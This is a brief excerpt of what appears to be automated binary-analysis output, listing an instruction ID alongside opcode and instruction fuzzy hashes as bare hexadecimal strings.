                                                          • Instruction ID: 5a5f4104602e31e4df6308e7fc842ec57fabc87dcc7fd054fc41ea296c4b91a8
                                                          • Opcode Fuzzy Hash: d898a1fe6d8244430d526caa5a6a0d12b7ab91cd18e0f2629e8750ee9d6567f0
                                                          • Instruction Fuzzy Hash: D5418EB2B043059FEB248F19DD94BA7B7E8FF44758F01082DEA4A87651EB71E904DB11